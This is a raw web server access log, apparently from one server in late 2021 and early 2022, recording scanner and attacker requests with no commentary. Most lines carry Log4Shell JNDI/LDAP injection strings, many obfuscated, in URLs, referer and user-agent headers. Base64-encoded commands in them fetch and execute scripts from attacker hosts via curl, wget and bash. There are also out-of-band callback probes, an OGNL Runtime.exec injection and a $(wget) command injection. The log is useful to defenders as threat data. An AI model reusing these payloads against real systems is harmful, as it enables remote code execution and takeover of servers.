195.54.160.149 - - [31/Dec/2021:23:58:35 +0000] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo} HTTP/1.1" 302 399 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}"
195.54.160.149 - - [01/Jan/2022:11:21:52 +0000] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzUwLjExNi40MS40ODo0NDMpfGJhc2g=} HTTP/1.1" 200 96 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzUwLjExNi40MS40ODo0NDMpfGJhc2g=}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzUwLjExNi40MS40ODo0NDMpfGJhc2g=}"
195.54.160.149 - - [01/Jan/2022:20:23:30 +0000] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo} HTTP/1.1" 302 399 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}"
195.54.160.149 - - [01/Jan/2022:20:23:30 +0000] "GET /?x=$%7bjndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo%7d HTTP/1.1" 200 5382 "http://50.116.41.48:80/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}"
199.127.60.104 - - [02/Jan/2022:02:34:46 +0000] "GET / HTTP/1.1" 302 203 "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//2.58.149.206:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMi41OC4xNDkuMjA2L3N0YXI7IGN1cmwgLU8gaHR0cDovLzIuNTguMTQ5LjIwNi9yc3RhcjsgY2htb2QgNzc3IHN0YXI7IC4vc3RhciBleHBsb2l0}')" "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//2.58.149.206:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMi41OC4xNDkuMjA2L3N0YXI7IGN1cmwgLU8gaHR0cDovLzIuNTguMTQ5LjIwNi9yc3RhcjsgY2htb2QgNzc3IHN0YXI7IC4vc3RhciBleHBsb2l0}')"
195.54.160.149 - - [02/Jan/2022:16:53:31 +0000] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo} HTTP/1.1" 302 399 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}"
195.54.160.149 - - [02/Jan/2022:16:53:32 +0000] "GET /?x=$%7bjndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo%7d HTTP/1.1" 200 5382 "http://50.116.41.48:80/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}"
195.54.160.149 - - [02/Jan/2022:16:53:31 +0000] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo} HTTP/1.1" 302 399 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}"
195.54.160.149 - - [02/Jan/2022:16:53:32 +0000] "GET /?x=$%7bjndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo%7d HTTP/1.1" 200 5382 "http://50.116.41.48:80/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}"
15.236.146.246 - - [02/Jan/2022:18:50:42 +0000] "GET / HTTP/1.1" 200 96 "-" "${${date:'j'}${date:'n'}${date:'d'}${date:'i'}:${date:'l'}${date:'d'}${date:'a'}${date:'p'}://4sclil.dnslog.cn:1389/8zl73o}"
15.236.146.246 - - [02/Jan/2022:18:50:43 +0000] "GET / HTTP/1.1" 200 96 "${${date:'j'}${date:'n'}${date:'d'}${date:'i'}:${date:'l'}${date:'d'}${date:'a'}${date:'p'}://4sclil.dnslog.cn:1389/8zl73o}" "python-requests/2.26.0"
15.236.146.246 - - [02/Jan/2022:18:50:50 +0000] "GET / HTTP/1.1" 200 96 "-" "${${date:'j'}${date:'n'}${date:'d'}${date:'i'}:${date:'l'}${date:'d'}${date:'a'}${date:'p'}://4sclil.dnslog.cn:1389/8zl73o}"
15.236.146.246 - - [02/Jan/2022:18:51:06 +0000] "GET / HTTP/1.1" 200 96 "${${date:'j'}${date:'n'}${date:'d'}${date:'i'}:${date:'l'}${date:'d'}${date:'a'}${date:'p'}://4sclil.dnslog.cn:1389/8zl73o}" "python-requests/2.26.0"
69.49.235.93 - - [05/Jan/2022:00:48:03 +0000] "HEAD /?x=${jndi:ldap://162.241.127.99:1389/Basic/Command/Base64/KGN1cmwgLXMgMTYyLjI0MS4xMjcuOTk6MTM4OS9iY2FibGUubmV0fHx3Z2V0IC1xIC1PLSAxNjIuMjQxLjEyNy45OToxMzg5L2JjYWJsZS5uZXQpfGJhc2g=} HTTP/1.1" 400 - "-" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://162.241.127.99:1389/Basic/Command/Base64/KGN1cmwgLXMgMTYyLjI0MS4xMjcuOTk6MTM4OS9iY2FibGUubmV0fHx3Z2V0IC1xIC1PLSAxNjIuMjQxLjEyNy45OToxMzg5L2JjYWJsZS5uZXQpfGJhc2g=}"
69.49.235.93 - - [05/Jan/2022:00:48:03 +0000] "HEAD /?x=${jndi:ldap://162.241.127.99:1389/Basic/Command/Base64/KGN1cmwgLXMgMTYyLjI0MS4xMjcuOTk6MTM4OS9iY2FibGUubmV0fHx3Z2V0IC1xIC1PLSAxNjIuMjQxLjEyNy45OToxMzg5L2JjYWJsZS5uZXQpfGJhc2g=} HTTP/1.1" 400 - "-" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://162.241.127.99:1389/Basic/Command/Base64/KGN1cmwgLXMgMTYyLjI0MS4xMjcuOTk6MTM4OS9iY2FibGUubmV0fHx3Z2V0IC1xIC1PLSAxNjIuMjQxLjEyNy45OToxMzg5L2JjYWJsZS5uZXQpfGJhc2g=}"
69.49.235.93 - - [05/Jan/2022:00:48:03 +0000] "HEAD /?x=${jndi:ldap://162.241.127.99:1389/Basic/Command/Base64/KGN1cmwgLXMgMTYyLjI0MS4xMjcuOTk6MTM4OS9iY2FibGUubmV0fHx3Z2V0IC1xIC1PLSAxNjIuMjQxLjEyNy45OToxMzg5L2JjYWJsZS5uZXQpfGJhc2g=} HTTP/1.1" 400 - "-" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://162.241.127.99:1389/Basic/Command/Base64/KGN1cmwgLXMgMTYyLjI0MS4xMjcuOTk6MTM4OS9iY2FibGUubmV0fHx3Z2V0IC1xIC1PLSAxNjIuMjQxLjEyNy45OToxMzg5L2JjYWJsZS5uZXQpfGJhc2g=}"
69.49.235.93 - - [05/Jan/2022:00:48:03 +0000] "HEAD /?x=${jndi:ldap://162.241.127.99:1389/Basic/Command/Base64/KGN1cmwgLXMgMTYyLjI0MS4xMjcuOTk6MTM4OS9iY2FibGUubmV0fHx3Z2V0IC1xIC1PLSAxNjIuMjQxLjEyNy45OToxMzg5L2JjYWJsZS5uZXQpfGJhc2g=} HTTP/1.1" 400 - "-" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://162.241.127.99:1389/Basic/Command/Base64/KGN1cmwgLXMgMTYyLjI0MS4xMjcuOTk6MTM4OS9iY2FibGUubmV0fHx3Z2V0IC1xIC1PLSAxNjIuMjQxLjEyNy45OToxMzg5L2JjYWJsZS5uZXQpfGJhc2g=}"
172.111.36.142 - - [05/Jan/2022:02:39:56 +0000] "GET / HTTP/1.1" 302 203 "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//2.58.149.206:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMi41OC4xNDkuMjA2L3N0YXI7IGN1cmwgLU8gaHR0cDovLzIuNTguMTQ5LjIwNi9zdGFyOyBjaG1vZCA3Nzcgc3RhcjsgLi9zdGFyIGV4cGxvaXQ=}')" "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//2.58.149.206:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMi41OC4xNDkuMjA2L3N0YXI7IGN1cmwgLU8gaHR0cDovLzIuNTguMTQ5LjIwNi9zdGFyOyBjaG1vZCA3Nzcgc3RhcjsgLi9zdGFyIGV4cGxvaXQ=}')"
194.163.179.92 - - [06/Jan/2022:06:33:09 +0000] "GET /Schemas/$%7B%27%27.class.forName%28%27javax.script.ScriptEngineManager%27%29.newInstance%28%29.getEngineByName%28%27js%27%29.eval%28%27java.lang.Runtime.getRuntime%28%29.exec%28%22id%22%29%27%29%7D HTTP/1.1" 404 357 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36"
194.163.179.92 - - [06/Jan/2022:07:15:52 +0000] "GET /?x=${jndi:ldap://127.0.0.1 HTTP/1.1" 200 96 "${jndi:ldap://127.0.0.1#.${hostName}.referer.c7ag9ka261mlsfo4hj80c8mjp3eyehnye.interact.sh}" "${jndi:ldap://127.0.0.1#.${hostName}.useragent.c7ag9ka261mlsfo4hj80c8mjp3eyehnye.interact.sh}"
107.77.226.82 - - [06/Jan/2022:21:29:27 +0000] "GET /?fmbor=${jndi:ldap://50.116.41.48.c7bkbdbk9oefo0kv4bp0c8mwmpoyyyyyn.domsearch.net/a} HTTP/1.1" 200 96 "-" "curl/7.64.0"
107.77.226.82 - - [06/Jan/2022:21:29:28 +0000] "GET / HTTP/1.1" 200 96 "-" "${jndi:ldap://50.116.41.48.c7bkbdbk9oefo0kv4bp0c8mwmpoyyyyyn.domsearch.net/a}"
107.77.106.58 - - [06/Jan/2022:21:35:07 +0000] "GET /?bocrk=${jndi:ldap://50.116.41.48.c7bkbdbk9oefo0kv4bp0c8mwmpoyyyyyn.domsearch.net/a} HTTP/1.1" 302 291 "-" "curl/7.64.0"
107.77.106.58 - - [06/Jan/2022:21:35:07 +0000] "GET / HTTP/1.1" 302 203 "-" "${jndi:ldap://50.116.41.48.c7bkbdbk9oefo0kv4bp0c8mwmpoyyyyyn.domsearch.net/a}"
107.77.224.190 - - [07/Jan/2022:19:29:55 +0000] "GET /?xrqer=${jndi:ldap://50.116.41.48.c7c8uejk9oeaa9pfcdvgc8ce6qoyyyyyn.domsearch.net/a} HTTP/1.1" 200 96 "-" "curl/7.64.0"
107.77.224.190 - - [07/Jan/2022:19:29:55 +0000] "GET / HTTP/1.1" 200 96 "-" "${jndi:ldap://50.116.41.48.c7c8uejk9oeaa9pfcdvgc8ce6qoyyyyyn.domsearch.net/a}"
107.77.76.34 - - [07/Jan/2022:19:35:43 +0000] "GET /?eeynv=${jndi:ldap://50.116.41.48.c7c8uejk9oeaa9pfcdvgc8ce6qoyyyyyn.domsearch.net/a} HTTP/1.1" 302 291 "-" "curl/7.64.0"
107.77.76.34 - - [07/Jan/2022:19:35:43 +0000] "GET / HTTP/1.1" 302 203 "-" "${jndi:ldap://50.116.41.48.c7c8uejk9oeaa9pfcdvgc8ce6qoyyyyyn.domsearch.net/a}"
107.77.226.150 - - [08/Jan/2022:21:34:43 +0000] "GET /?tnogg=${jndi:ldap://50.116.41.48.c7cvr7bk9oed2gu8p2r0c8c958oyyyyyn.domsearch.net/a} HTTP/1.1" 200 96 "-" "curl/7.64.0"
107.77.226.150 - - [08/Jan/2022:21:34:43 +0000] "GET / HTTP/1.1" 200 96 "-" "${jndi:ldap://50.116.41.48.c7cvr7bk9oed2gu8p2r0c8c958oyyyyyn.domsearch.net/a}"
107.77.106.77 - - [08/Jan/2022:21:40:57 +0000] "GET /?blxgt=${jndi:ldap://50.116.41.48.c7cvr7bk9oed2gu8p2r0c8c958oyyyyyn.domsearch.net/a} HTTP/1.1" 302 291 "-" "curl/7.64.0"
107.77.106.77 - - [08/Jan/2022:21:40:57 +0000] "GET / HTTP/1.1" 302 203 "-" "${jndi:ldap://50.116.41.48.c7cvr7bk9oed2gu8p2r0c8c958oyyyyyn.domsearch.net/a}"
194.163.179.92 - - [10/Jan/2022:06:38:18 +0000] "GET /?x=${jndi:ldap://${hostName}.c7ag9ka261mlsfo4hj80c8p7efabruxgc.interact.sh/a} HTTP/1.1" 200 96 "${jndi:ldap://${hostName}.referer.c7ag9ka261mlsfo4hj80c8p7efabruxgc.interact.sh}" "${jndi:ldap://${hostName}.useragent.c7ag9ka261mlsfo4hj80c8p7efabruxgc.interact.sh}"
107.77.226.8 - - [10/Jan/2022:18:18:54 +0000] "GET /?vfusn=${jndi:ldap://50.116.41.48.c7e76jbk9oe9miaog4igc8q8guoyyyyyn.domsearch.net/a} HTTP/1.1" 200 96 "-" "curl/7.64.0"
107.77.226.8 - - [10/Jan/2022:18:18:54 +0000] "GET / HTTP/1.1" 200 96 "-" "${jndi:ldap://50.116.41.48.c7e76jbk9oe9miaog4igc8q8guoyyyyyn.domsearch.net/a}"
107.77.106.23 - - [10/Jan/2022:18:24:43 +0000] "GET /?lwxgt=${jndi:ldap://50.116.41.48.c7e76jbk9oe9miaog4igc8q8guoyyyyyn.domsearch.net/a} HTTP/1.1" 302 291 "-" "curl/7.64.0"
107.77.106.23 - - [10/Jan/2022:18:24:43 +0000] "GET / HTTP/1.1" 302 203 "-" "${jndi:ldap://50.116.41.48.c7e76jbk9oe9miaog4igc8q8guoyyyyyn.domsearch.net/a}"
194.163.179.92 - - [11/Jan/2022:01:20:45 +0000] "GET /solr/admin/collections?action=$%7Bjndi:ldap://$%7BhostName%7D.c7ag9ka261mlsfo4hj80c8qpskebjow86.interact.sh/a%7D HTTP/1.1" 404 220 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36"
144.21.52.153 - - [11/Jan/2022:02:39:25 +0000] "GET /:80:undefined HTTP/1.1" 302 218 "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//143.198.109.43:1389/TomcatBypass/Command/Base64/Y2QgL3RtcCB8fCBjZCAvdmFyL3J1biB8fCBjZCAvbW50IHx8IGNkIC9yb290IHx8IGNkIC87IHdnZXQgaHR0cDovLzE1OS4yMjMuMTg2LjMvOFVzQS5zaDsgY3VybCAtTyBodHRwOi8vMTU5LjIyMy4xODYuMy84VXNBLnNoOyBjaG1vZCA3NzcgOFVzQS5zaDsgc2ggOFVzQS5zaA==}')" "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//143.198.109.43:1389/TomcatBypass/Command/Base64/Y2QgL3RtcCB8fCBjZCAvdmFyL3J1biB8fCBjZCAvbW50IHx8IGNkIC9yb290IHx8IGNkIC87IHdnZXQgaHR0cDovLzE1OS4yMjMuMTg2LjMvOFVzQS5zaDsgY3VybCAtTyBodHRwOi8vMTU5LjIyMy4xODYuMy84VXNBLnNoOyBjaG1vZCA3NzcgOFVzQS5zaDsgc2ggOFVzQS5zaA==}')"
5.157.38.50 - - [11/Jan/2022:06:42:18 +0000] "GET /${jndi:ldap://121.140.99.236:1389/Exploit} HTTP/1.1" 404 239 "-" "Mozilla/5.0 (platform; rv:geckoversion) Gecko/geckotrail Firefox/firefox"
5.157.38.50 - - [11/Jan/2022:06:42:18 +0000] "GET / HTTP/1.1" 200 96 "-" "${jndi:ldap://121.140.99.236:1389/Exploit}"
107.77.224.150 - - [11/Jan/2022:16:04:06 +0000] "GET /?ntavz=${jndi:ldap://50.116.41.48.c7eqan3k9oebhnccchggc8q4kzeyyyyyn.domsearch.net/a} HTTP/1.1" 200 96 "-" "curl/7.64.0"
107.77.224.150 - - [11/Jan/2022:16:04:06 +0000] "GET / HTTP/1.1" 200 96 "-" "${jndi:ldap://50.116.41.48.c7eqan3k9oebhnccchggc8q4kzeyyyyyn.domsearch.net/a}"
107.77.76.77 - - [11/Jan/2022:16:09:35 +0000] "GET /?mfafl=${jndi:ldap://50.116.41.48.c7eqan3k9oebhnccchggc8q4kzeyyyyyn.domsearch.net/a} HTTP/1.1" 302 291 "-" "curl/7.64.0"
107.77.76.77 - - [11/Jan/2022:16:09:35 +0000] "GET / HTTP/1.1" 302 203 "-" "${jndi:ldap://50.116.41.48.c7eqan3k9oebhnccchggc8q4kzeyyyyyn.domsearch.net/a}"
165.232.155.141 - - [12/Jan/2022:00:35:19 +0000] "GET /?test=t(%27$%7B$%7Benv:NaN:-j%7Dndi$%7Benv:NaN:-:%7D$%7Benv:NaN:-l%7Ddap$%7Benv:NaN:-:%7D//137.184.40.48:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTU4LjEwMS4xMTguMjM2L3NldHVwOyBjdXJsIC1PIGh0dHA6Ly8xNTguMTAxLjExOC4yMzYvc2V0dXA7IGNobW9kIDc3NyBzZXR1cDsgLi9zZXR1cCBleHBsb2l0%7D%27) HTTP/1.1" 302 512 "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//137.184.40.48:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTU4LjEwMS4xMTguMjM2L3NldHVwOyBjdXJsIC1PIGh0dHA6Ly8xNTguMTAxLjExOC4yMzYvc2V0dXA7IGNobW9kIDc3NyBzZXR1cDsgLi9zZXR1cCBleHBsb2l0}')" "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//137.184.40.48:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTU4LjEwMS4xMTguMjM2L3NldHVwOyBjdXJsIC1PIGh0dHA6Ly8xNTguMTAxLjExOC4yMzYvc2V0dXA7IGNobW9kIDc3NyBzZXR1cDsgLi9zZXR1cCBleHBsb2l0}')"
165.232.155.141 - - [12/Jan/2022:00:35:20 +0000] "GET /?test=t(%2527$%257B$%257Benv:NaN:-j%257Dndi$%257Benv:NaN:-:%257D$%257Benv:NaN:-l%257Ddap$%257Benv:NaN:-:%257D//137.184.40.48:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTU4LjEwMS4xMTguMjM2L3NldHVwOyBjdXJsIC1PIGh0dHA6Ly8xNTguMTAxLjExOC4yMzYvc2V0dXA7IGNobW9kIDc3NyBzZXR1cDsgLi9zZXR1cCBleHBsb2l0%257D%2527) HTTP/1.1" 200 5382 "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//137.184.40.48:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTU4LjEwMS4xMTguMjM2L3NldHVwOyBjdXJsIC1PIGh0dHA6Ly8xNTguMTAxLjExOC4yMzYvc2V0dXA7IGNobW9kIDc3NyBzZXR1cDsgLi9zZXR1cCBleHBsb2l0}')" "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//137.184.40.48:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTU4LjEwMS4xMTguMjM2L3NldHVwOyBjdXJsIC1PIGh0dHA6Ly8xNTguMTAxLjExOC4yMzYvc2V0dXA7IGNobW9kIDc3NyBzZXR1cDsgLi9zZXR1cCBleHBsb2l0}')"
143.198.71.190 - - [12/Jan/2022:12:16:49 +0000] "GET / HTTP/1.1" 302 203 "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//51.79.240.74:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTg5LjE1OS40Ny4yMTgvbHNoYm9vdDsgY2htb2QgK3ggbHNoYm9vdDsgLi9sc2hib290IGxzaGJvb3Q7IHJtIGxzaGJvb3Q=}')" "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//51.79.240.74:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTg5LjE1OS40Ny4yMTgvbHNoYm9vdDsgY2htb2QgK3ggbHNoYm9vdDsgLi9sc2hib290IGxzaGJvb3Q7IHJtIGxzaGJvb3Q=}')"
194.163.179.92 - - [12/Jan/2022:14:41:28 +0000] "GET /?action=command&command=set_city_timezone&value=$(wget%20http://c7ag9ka261mlsfo4hj80c8xqoiybo6qj6.interact.sh)) HTTP/1.1" 200 96 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36"
107.77.224.51 - - [12/Jan/2022:16:04:59 +0000] "GET /?yrwpc=${jndi:ldap://50.116.41.48.c7ffdh3k9oeef5q47ri0c8xxpteyyyyyn.domsearch.net/a} HTTP/1.1" 200 96 "-" "curl/7.64.0"
107.77.224.51 - - [12/Jan/2022:16:04:59 +0000] "GET / HTTP/1.1" 200 96 "-" "${jndi:ldap://50.116.41.48.c7ffdh3k9oeef5q47ri0c8xxpteyyyyyn.domsearch.net/a}"
107.77.76.115 - - [12/Jan/2022:16:11:11 +0000] "GET /?uwgro=${jndi:ldap://50.116.41.48.c7ffdh3k9oeef5q47ri0c8xxpteyyyyyn.domsearch.net/a} HTTP/1.1" 302 291 "-" "curl/7.64.0"
107.77.76.115 - - [12/Jan/2022:16:11:11 +0000] "GET / HTTP/1.1" 302 203 "-" "${jndi:ldap://50.116.41.48.c7ffdh3k9oeef5q47ri0c8xxpteyyyyyn.domsearch.net/a}"
107.77.223.53 - - [13/Jan/2022:17:40:02 +0000] "GET /?smtxw=${jndi:ldap://50.116.41.48.c7g4153k9oe8k76qfohgc8orbfeyyyyyn.domsearch.net/a} HTTP/1.1" 200 96 "-" "curl/7.64.0"
107.77.223.53 - - [13/Jan/2022:17:40:02 +0000] "GET / HTTP/1.1" 200 96 "-" "${jndi:ldap://50.116.41.48.c7g4153k9oe8k76qfohgc8orbfeyyyyyn.domsearch.net/a}"
107.77.70.119 - - [13/Jan/2022:17:46:55 +0000] "GET /?ilvfj=${jndi:ldap://50.116.41.48.c7g4153k9oe8k76qfohgc8orbfeyyyyyn.domsearch.net/a} HTTP/1.1" 302 291 "-" "curl/7.64.0"
107.77.70.119 - - [13/Jan/2022:17:46:55 +0000] "GET / HTTP/1.1" 302 203 "-" "${jndi:ldap://50.116.41.48.c7g4153k9oe8k76qfohgc8orbfeyyyyyn.domsearch.net/a}"
107.77.226.123 - - [14/Jan/2022:22:49:21 +0000] "GET /?uzpkh=${jndi:ldap://50.116.41.48.c7gvhmjk9oebi6fv3h0gc8o9tzyyyyyyn.domsearch.net/a} HTTP/1.1" 200 96 "-" "curl/7.64.0"
